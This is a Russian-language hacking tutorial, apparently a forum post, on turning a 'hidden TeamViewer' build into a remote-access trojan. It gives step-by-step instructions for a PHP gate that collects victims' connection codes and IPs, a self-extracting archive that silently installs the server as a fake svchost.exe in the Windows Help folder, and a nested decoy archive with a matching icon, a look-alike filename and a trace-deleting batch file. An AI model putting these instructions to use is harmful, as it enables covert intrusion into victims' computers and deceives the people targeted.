Скрытый TeamViewer


Скрытый TeamViewer

Давно я уже обещал написать на эту тему и развиить тему удалённого управления тачкой жертвы, но сначала никак не мог найти рабочую версию, потом никак руки не доходили всё описать. Хотя на самом то деле тут всё очень просто!
Для начала нужно скачать саму программу, так что пока ставим качаться скрытый TeamViewer и читаем дальше
Итак, скрытый (Hidden) TeamViewer - программа аналогичная радмину. Она так же служит для удалённого управления компьютером или передачи файлов. Главное преимущество скрытой сборки - вам больше не нужно пытаться выяснить ip вашей жертвы для подключения. Программа сама отправляет данные для подключения (код и пароль) и ip жертвы на ваш гейт (на хостинг).
Скачали? Отлично. Давайте для начала всё настроим. Прежде всего, нужен хостинг с поддержкой php для гейта (куда будет приходить код подключения и ip жертвы). Подойдёт *а всё, больше не подойдёт. Не работает рега, ищите другие *
На хостинг в корневую директорию (htdocs в нашем случае) загружаем файлы из папки Host. На stat.txt ставим права 777!. В этом файле и будем смотреть коды и айпишники. Всё, с хостингом закончили, гейт установлен!
Теперь в папке в вьюером запускаем config.bat. В открывшемся текстовичке вместо host.com прописываем адрес нашего хостинга, вместо 1234 выбираем пароль длиной строго 4 символа! Сохраняем, закрываем.
Теперь запускаем build.bat. Он создаст в папке SOURCE файл tv.dll с нашими настройками. Кидаем этот файл в папку Server.Кстати, этот же батник создаёт ещё один файл в папке plugin, который может палиться антивирусником как нечисть. Смело удаляем эту хрень.
Вот и всё, прогу мы настроили , осталось собрать содержимое папки Server и впарить жертве.


 

Собираем ядовитый архив



Метод склейки\джойна при помощи самораспаковывающегося архива был описан в основной части урока, так что делаем всёпо принципу[/u] так же. Так что описываю только самое главное: создаём архив, метод сжатия: максимальный (иначе много весит), назначаем самораспаковывающимся, открываем параметры SFX, настраиваем следующее:

  • распаковывать в папку: %WINDIR%\Help

  • выполнить после распаковки: svchost.exe

  • режимы: скрыть всё, перезапсывать все

Всё, тыкаем ок, архив готов... но не совсем!
Очень важно то, что архив нельзя запускать больше одного раза (попробуйте сами - поймёте какое палево ), так что нужно будет этот архив положить в ещё один. Второй архив так же будет самораспаковываться, запускать первый архив (устанавливать вьюер), удалять первый архив, удалять себя самого. И на своём месте оставит любую нашу прогу, под видом которой мы впариваем жертве вьюера. Важный момент: второй архив должен иметь такую же иконку (настраивается в параметрах SFX на вкладке "графика") и похожее имя. Для этого назовите прогу рrog.exe, а второй[/u] архив - prog.exe (копируйте имена прямо отсюда, они на самом деле разные ).
В него кинем наш первый архив плюс ещё один файл для маскировки (хотите - картинку, но лучше - программку, так как у нас получится .exe) и батник (файл run.bat) такого содержания:


Code

Server.exe
del Server.exe
del prog.exe
del run.bat
Где Server.exe - имя нашего первого архива.
Все эти 3 файла закатываем в архив точно таким же макаром, но:

  • имя архива: prog.exe

  • Путь для распаковки: В текущей папке

  • Выполнить после распаковки: run.bat

  • Значок установить такой же, как значок программы!

Если вы всё сделали точь-в-точь правильно, то после запуска этого архива он должен на своём месте оставить только 1 прогу(которая выглядеть будет так же как архив).
Вот и всё, хэппи энд! У жертвы установится тим-вьюер, который будет слать код подключения на гейт при каждом подключении жертвы к инету, а останется только прога, которую мы всунули для маскировки... (весь остальной хлам удалиться без следов).
Пользуйте наздоровье! Как? Да элементарно!

Коннектимся к жертве...



В папке с вашим вьюером есть папка client. открываем её и запускаем вьюер оттуда (если не хочет, значит вы уже запустили у себя свой же скрытый сервер xD как удалить - читаем ниже). Вводим куда надо код подключения (приходит на гейт), жмём на подключение, вводим пароль (а вы его сами настраивали, смотрим config ) и вуаля... мы имеем удалённый доступ и жертву разом!

Деинсталляция

Запустили ненароком свой же скрытый TeamViewer у себя? Да ничего страшного нет, код всё равно только вам приходит и пароль знаете только вы... но всё же, зачем нам лишние процессы?
Открывайте диспетчер задач и вырубайте тот svchost.exe, который запущен от пользователя с вашим именем[/u] (то есть не system или local service). Теперь откройте командную строку и введите:
del %windir%\Help\svchost.exe
Всё, TeamViewer вы снесли! =) На этой оптимистической ноте и закончим, пока больше ничего не сломали!